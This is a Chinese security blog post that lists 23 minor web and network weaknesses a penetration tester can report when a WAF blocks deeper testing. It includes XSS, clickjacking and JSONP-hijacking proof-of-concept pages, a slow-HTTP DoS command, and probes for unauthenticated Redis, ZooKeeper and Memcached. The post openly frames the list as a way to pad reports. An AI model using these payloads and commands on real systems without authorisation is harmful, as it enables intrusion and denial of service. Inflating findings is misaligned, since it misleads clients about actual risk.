网安牛马碰见WAF如何凑出渗透报告漏洞数量?

admin 2024年12月9日14:28:03评论5 views字数 5304阅读17分40秒阅读模式

当初熊猫为了脱离“菜鸡”称号可谓是煞费苦心,在测试有WAF防护的网站时,也会想办法凑出一堆中低危漏洞来充实报告内容,以证实工作量,便于划水......

那都有哪些漏洞可以用来凑数量呢?

WARN

 

1.Swagger-UI 反射型 XSS

漏洞场景:

发现网站存在Swagger-UI的入口页面swagger-ui.html。

漏洞复现

需要提前构造一个配置文件test.json放到自己的服务器里面,如下所示:

{"url": "https://jumpy-floor.surge.sh/test.yaml","urls": [   {       "url": "https://jumpy-floor.surge.sh/test.yaml",       "name": "Foo"   }]}

然后在Swagger-UI中使用?configUrl=和url参数复现XSS漏洞,加载的类型比如这样:

/swagger-ui.html?configUrl=https://jumpy-floor.surge.sh/test.json/swagger-ui.html?url=https://jumpy-floor.surge.sh/test.json/swagger-ui.html?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

2.JQuery框架Dom型XSS

漏洞场景:

发现网站使用jQuery-js,并且版本与poc匹配。

漏洞复现:

poc中填写目标站点的JQueryjs地址,如图所示:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

<!DOCTYPE html><!-- poc请自行复制,保存为html格式 --><html lang="zh"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <meta http-equiv="X-UA-Compatible" content="ie=edge">    <title>Jquery XSS</title>    <script type="text/javascript" src="https://***.***.***/js/jquery-easyui-1.5.2/jquery.easyui.min.js"></script>    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.9.1/jquery.js"></script> -->    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.11.1/jquery.js"></script> -->    <!-- <script type="text/javascript" src="https://cdn.bootcss.com/jquery/1.12.1/jquery.js"></script> -->    <script>        $(function () {            // #9521            // #11290            $(location.hash);            // #11974            $('#bug').on('click', function () {                $.parseHTML("<img src='z' onerror='alert("bug-11974")'>");                return false;            });        })</script></head><body>    <h1>jQuery with XSS</h1>    <h2>Demo:</h2>    <p style="color:red;">Note: Source code changes jQuery version,As long as there is no bullet window, there will be no problem.!</p>    <ul>        <li><a href="#<img src=/ onerror=alert(1)>" target="_blank">bug-9521</a> => <a                href="https://bugs.jquery.com/ticket/9521" target="_blank">ticket</a></li>        <li><a href="#p[class='<img src=/ onerror=alert(2)>']" target="_blank">bug-11290</a> => <a                href="https://bugs.jquery.com/ticket/11290" target="_blank">ticket</a></li>        <li><a href="#11974" id="bug">bug-11974</a> => <a href="https://bugs.jquery.com/ticket/11974"                target="_blank">ticket</a></li>    </ul>    <h2>Test version:</h2>    <ul>        <li><a href="http://research.insecurelabs.org/jquery/test/" target="_blank">test result</a></li>    </ul>    <h2>Safe version:</h2>    <ul>        <li>1.12.0, 1.12.1 </li>        <li>2.2.0, 2.2.1</li>        <li>3.0.0, 3.0.1, 3.1.0, 3.1.1</li>    </ul></body></html>
复现截图:

然后本地浏览器打开poc点击test result,弹窗则证明存在漏洞:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

3.SSLv2 Drown攻击信息泄露漏洞

漏洞场景:

发现网站系统支持了SSLv2加密算法,且该算法被暴露存在Drown跨协议攻击TLS漏洞。

漏洞复现:

通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况(工具下载链接如下)。

https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip运行方式:sslciphercheck.exe -h ip(目标地址) -p 443

或者使用nmap输入如下命令:

nmap -sV -p 端口 --script ssl-enum-ciphers 目标ip
复现截图:

sslciphercheck显示如下则证明存在漏洞:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

4.启用不安全的WebDAV模块

漏洞场景:

网站使用HTTP协议。

漏洞复现:

这个风险也叫不安全的HTTP方法,发现渗透网站是HTTP方法后,使用curl命令探测:

curl -I -X OPTIONS https://目标网站URL
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

5.易受Dos慢速攻击

漏洞场景:

网站为HTTP协议。

漏洞复现:

需要本地下载slowhttptest工具,然后使用命令验证即可:

项目地址:https://github.com/shekyan/slowhttptestslowhttptest -c 65500 -B -i 10 -r 200 -s 8192 -t SLOWBODY -u https://xxxxxx

当显示为NO,则表示存在HTTP慢速攻击漏洞,可导致拒绝服务。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

6.SSH支持弱加密算法风险

漏洞场景:

开放22端口。

漏洞复现:

使用nmap输入如下命令扫描:

nmap --script ssh2-enum-algos -sV -p 22 [IP]

查看扫描结果中的加密算法情况。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

7.POODLE信息泄露漏洞

漏洞场景:

发现网站系统使用了SSLv3协议。

漏洞复现:

通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况。

https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip运行方式:sslciphercheck.exe -h ip(目标地址) -p 443
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

8.SSL重协商漏洞

漏洞场景:

莽怼。

漏洞复现:

通过加密算法检测工具sslciphercheck,与网站系统进行加密算法枚举通信,探测系统存在的加密算法情况。

https://github.com/woanware/woanware.github.io/blob/master/downloads/sslciphercheck.v.1.4.2.zip运行方式:sslciphercheck.exe -h ip(目标地址) -p 443
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

9.HOST头部攻击

漏洞场景:

莽怼。

漏洞复现:

通常awvs可能会扫到,扫不到就是抓包之后改host即可,很简单。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

10.点击劫持漏洞

漏洞场景:

莽怼。

漏洞复现:

通过替换poc中的URL,本地浏览器打开html查看是否被iframe标签嵌套。

<html><head><title>Clickjacking</title></head><body><iframe src="https://test.com/" width="500" height="500" /></iframe>
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

11.前端js.map文件暴露导致vue代码泄露

漏洞场景:

扫描发现有.map文件。

漏洞复现:

下载.map文件后,使用reverse-sourcemap还原vue代码。

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

使用npm安装reverse-souecemap,命令如下:

npm install reverse-sourcemap -greverse-sourcemap -o /存放逆向出源码的目录 -v /.map文件所在的目录

下载.map文件后,使用reverse-sourcemap还原vue代码。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

12.httpOnly Cookie信息泄露

漏洞场景:

Apache解析。

漏洞复现:

通过Burpsuite抓包对参数注入超长字节,使用户的cookie大于4k。

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

复现截图:

返回报错页面泄露用户Cookie信息。

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

13.未设置cookie的httponly属性

漏洞场景:

莽怼。

漏洞复现:

通过浏览器控制台输入如下命令,弹窗及存在风险。

javascript:alert(document.cookie)
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

14.域名防护设置缺失

漏洞场景:

莽怼。

漏洞复现:

浏览器访问如下测试地址输入目标URL。

http://whois.chinaz.com/caimipai.com

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

15.会话登出失效

漏洞场景:

莽怼。

漏洞复现:

通过手动点击注销登录之后使用注销的token继续尝试增删改查。

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

16.JsonP劫持漏洞

漏洞场景:

莽怼。

漏洞复现:

将URL填入POC,浏览器打开html,弹窗则证明漏洞存在。

<html>  <body><script> function wooyun_callback(a){  alert(a);  }  </script>  <script src="http://www.test.com/login.php?callback=wooyun_callback"></script>    </body></html>
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

17.CORS

漏洞场景:

基本Xray、AWVS都会扫出来。

漏洞复现:

直接上扫描。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

18.Memcached 未授权访问漏洞

漏洞场景:

开放端口:11211。

漏洞复现:

nmap直接上扫描。

nmap -sV -p 11211 --script=memcached-info 目标ip
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

19.ZooKeeper 未授权访问

漏洞场景:

开放端口:2181。

漏洞复现:

直接上kali。

echo envi | nc 目标ip 2181
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

20.NFS未授权访问

漏洞场景:

开放端口:2049 (默认)。

漏洞复现:

直接上kali。

showmount -e IP
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

21.Redis未授权访问

漏洞场景:

开放端口:6379。

漏洞复现:

直接上kali。

redis-cli -h IP -p port
复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

22.Webpack源码泄露

漏洞场景:

莽怼。

漏洞复现:

浏览器开发者模式看见Webpack提就完事了。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

23.OSS存储漏洞

漏洞场景:

有存储桶文件访问。

漏洞复现:

直接看,当敏感文件上传到公开空间,则任何知道URL链接的人都能访问。

复现截图:

网安牛马碰见WAF如何凑出渗透报告漏洞数量?

总结

除以上漏洞外,其实还有好多类似的漏洞,比如明文传输核心业务数据、多点认证缺陷、弱加密风险、IIS段文件名漏洞、证书失效、各种信息泄露.......

这些大家都知道的熊猫就不写了,关键就是看大家愿不愿意。

熊猫认为,只要有明确的整改建议以及明确的漏洞成因,那测到的漏洞就全可以提,干就完了,要不然还以为咱不知道这些漏洞呢。

原文始发于微信公众号(Jie安全):网安牛马碰见WAF如何凑出渗透报告漏洞数量?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月9日14:28:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网安牛马碰见WAF如何凑出渗透报告漏洞数量?https://cn-sec.com/archives/3485662.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息